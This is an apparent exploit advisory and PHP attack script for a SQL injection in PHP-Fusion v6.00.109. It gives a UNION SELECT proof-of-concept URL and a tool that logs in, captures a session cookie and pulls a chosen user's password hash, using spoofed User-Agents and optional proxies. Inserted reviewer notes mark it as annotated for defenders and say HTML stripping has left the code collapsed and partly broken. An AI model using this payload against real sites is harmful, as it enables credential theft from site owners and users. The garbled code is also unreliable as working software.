PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure site: http://www.php-fusion.co.uk - if magic_quotes off -> SQL Injection, poc: http://[target]/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT user_password FROM fusion_users WHERE user_name='[admin_username]'/* now hash is showed in "To:" field when you post a private message this is the tool: *** PHP-Fusion v6.00.109 SQL Injection ***

PHP-Fusion v6.00.109 SQL Injection / admin|user credentials disclosure

a script by rgod at http://rgod.altervista.org

hostname ( ex: www.sitename.com )

path (ex: /phpfusion/ or just /)

specify a port other than 80 (default value)

your username

your password ( to get a valid session cookie)

user whom you want the password

send exploit through an HTTP proxy

'; /* NOTE(review): this copy has had its HTML stripped and its statements collapsed onto a few physical lines; the leading "';" appears to be the tail of an echoed input form, and the many echo "" calls below were presumably table markup. It is kept byte-for-byte here and annotated for defenders, not repaired. */ /* show($headeri): prints a hex/ASCII dump of the request buffer before it is sent. $ji counts the column within a 16-byte row, $ci counts completed rows, $ki is the byte offset of the current row. With the markup gone, most echo "" calls emit nothing, so the dump no longer renders as originally intended. */ function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; /* one byte per iteration; dechex(ord(...)) yields 1 or 2 hex digits, hence the zero-padding branch below */ while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; /* NOTE(review): $proxy_regex is a file-level variable but is not named in sendpacket()'s global statement, so inside that function it is undefined and the eregi() proxy-format check would reject every proxy value — confirm. The ereg/eregi family was removed in PHP 7, so this script only runs on PHP 5 or older. */ /* sendpacket(): writes the global $packet to a plain (non-TLS) TCP socket, either directly to $host:$port or via the host:port in $proxy, reads the reply into global $html and echoes it HTML-escaped. The direct branch does not check fsockopen()'s return value before fputs(); only the proxy branch does. */ function sendpacket() { global $proxy, $host, $port, $html, $packet; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,2048); } } fclose($ock); echo nl2br(htmlentities($html)); } /* Main flow. $host, $path, $port, $user, $pass, $username and $proxy are expected to arrive from the stripped form (register_globals-era style; nothing here reads $_GET/$_POST explicitly). Defender notes on what this traffic looks like: step 1 is a POST to news.php with User-Agent "Googlebot/2.1" and a fixed PHPSESSID cookie value; step 2 is a GET to messages.php whose msg_send parameter carries a UNION SELECT against fusion_users, under User-Agent "GameBoy, Powered by Nintendo". Both are distinctive in access logs and WAF telemetry. The session cookie is parsed out of the first Set-Cookie header of the login response. NOTE(review): in this collapsed copy the "#STEP 1" comment that follows runs to the end of the physical line, swallowing the statements after it; the original source had line breaks there. */ if (($path<>'') and ($host<>'') and ($user<>'') and ($pass<>'') and ($username<>'')) { if ($port=='') {$port=80;} #STEP 1 -> login, to retrieve a session cookie... $data="user_name=".urlencode(trim($user))."&user_pass=".urlencode(trim($pass))."&login=Login"; if ($proxy=='') {$packet="POST ".$path."news.php HTTP/1.1\r\n";} else {$packet="POST http://".$host.$path."news.php HTTP/1.1\r\n";} $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.$path."/news.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n"; $packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); $temp=explode("Set-Cookie: ",$html); $temp2=explode(' ',$temp[1]); $cookie=$temp2[0]; echo '
Your cookie: '.htmlentities($cookie); /* Step 2 below only strips single quotes from $username before placing it in the query string; the vulnerable parameter is msg_send, which the target reportedly used unescaped when magic_quotes was off (the fix on the application side is to parameterise/escape that input, not to rely on magic_quotes). The 'For Members only' check detects a failed login. NOTE(review): the second explode() uses an empty delimiter — its HTML-tag delimiter was evidently stripped with the markup — and explode('') fails in PHP, so $hash extraction does not work in this copy. As above, the "# STEP 2" comment runs to the end of this physical line. */ # STEP 2 -> SQL Injection, now retrieve the MD5 password hash from database $username=str_replace("'","",$username); $sql="' UNION SELECT user_password FROM fusion_users WHERE user_name='".trim($username)."'/*"; if ($proxy=='') {$packet="GET ".$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1\r\n";} else {$packet="GET http://".$host.$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1\r\n";} $packet.="User-Agent: GameBoy, Powered by Nintendo\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Cookie2: \$Version=1\r\n"; $packet.="Connection: Keep-Alive, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n\r\n"; show($packet); sendpacket($packet); if (eregi('For Members only',$html)) {echo 'You have to specify a valid session cookie...'; die; } $temp=explode("'Click to view the senders profile'>",$html); $temp2=explode("",$temp[1]); $hash=$temp2[0]; echo '
Username: '.htmlentities($username).' Password hash: '.$hash; /* $username is HTML-escaped on output but $hash (taken straight from the remote response) is not — inconsistent with the escaping used elsewhere in this file. */ } else { echo '
Fill requested fields, optionally specify a proxy...';} ?> rgod site: http://rgod.altervista.org mail: retrogod@aliceposta.it